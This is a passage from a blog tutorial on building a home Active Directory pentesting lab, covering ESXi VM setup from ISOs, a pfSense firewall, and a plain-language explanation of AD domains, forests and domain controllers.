After that finishes, do yourself a favor. Upload your other ISO the Windows 10 machine also. In my case I had a Windows 8.1 32 bit ISO already downloaded so that’s what I used. To simulate a corporate network I’d suggest at least 9 machines. You’re going to upload until your thumbs hurt haha. You’ll also need a PFSense ISO that’ll be our virtual Firewall – you can grab it from here and upload that ISO like the other images. Download your ISO’s from where ever you’re finding them, upload them to the datastore, and repeat. Repeat until you’re close to the setup I have below.

Back at our Dashboard we can now see our VM list has grown from 0 to 1. Clicking on it and selecting Power On. This will load the VM and install Windows like we’ve done a thousand times prior. Repeat the process for all your client machines. This is the part that takes the most time so you can upload a bunch and go to sleep or something.

Note: I am switching from the virtual environment where I was demonstrating the the installation process to my actual ESXI server. The one you laughed about earlier smh.

You should now have the beginnings of an AD Pentesting lab. Mines looks like the following:

Enough VMs to make you jealous

Active Directory & Windows Domains

An Active Directory domain is a collection of objects within a Microsoft Active Directory network. An object can be a single user, a group or it can be a hardware component, such as a computer or printer. Each domain holds a database containing object identity information.

Active Directory domains are grouped in a tree structure; a group of Active Directory trees is known as a forest, which is the highest level of organization within Active Directory. Active Directory domains can have multiple child domains, which in turn can have their own child domains. Authentication within Active Directory works through a transitive trust relationship.

Active Directory domains can be identified using a DNS name, which can be the same as an organization’s public domain name, a sub-domain or an alternate version (which may end in .local). While Group Policy can be applied to an entire domain, it is typical to apply policies to sub-groups of objects known as organizational units (OUs). All object attributes, such as usernames, must be unique within a single domain and, by extension, an OU.

That was a mouthful. Let’s try to explain it in layman’s terms. A domain is simply a group of computers or devices that can be managed centrally. A domain controller is the server edition of Windows in the environment that responds to authentication request from other systems on the domain. This server implements the Active Directory roles/responsibilities, and stores all the user account information for the domain, enforces the security policy, and can run the domain’s DHCP & DNS servers.

Feel free to read, Google and pause if you want to research any of these topics in depth. For now just accept that this is all you need. I’ll give you everything else that’s pertinent exactly when it’s required. This is enough to get us off the ground running.


Here’s what I hope you learned about in this post:

  1. My motivations to start this series & what I hope to accomplish
  2. You can deploy a pretty nice lab for close to nothing if you have the time
  3. How to write ISOs to flash drives if you’ve never done it in the past
  4. How to install an ESXI server
  5. How to install VM OSes inside your ESXI server
  6. A little bit about Active Directory & Window Domains

 

For the next post I have the following agenda:

  1. Configure our first DC
  2. Promoting the server to be DC
  3. Installing the Active Directory roles & responsibilities
  4. Install the DNS role
  5. Installing the DHCP role
  6. Configuring OU’s
  7. Joining a client to our domain
  8. Learning about GPO
  9. Setting up our PFSense firewall.

Until next time !

The post AD Amusement Park – Part 1 appeared first on Certification Chronicles.

❌
❌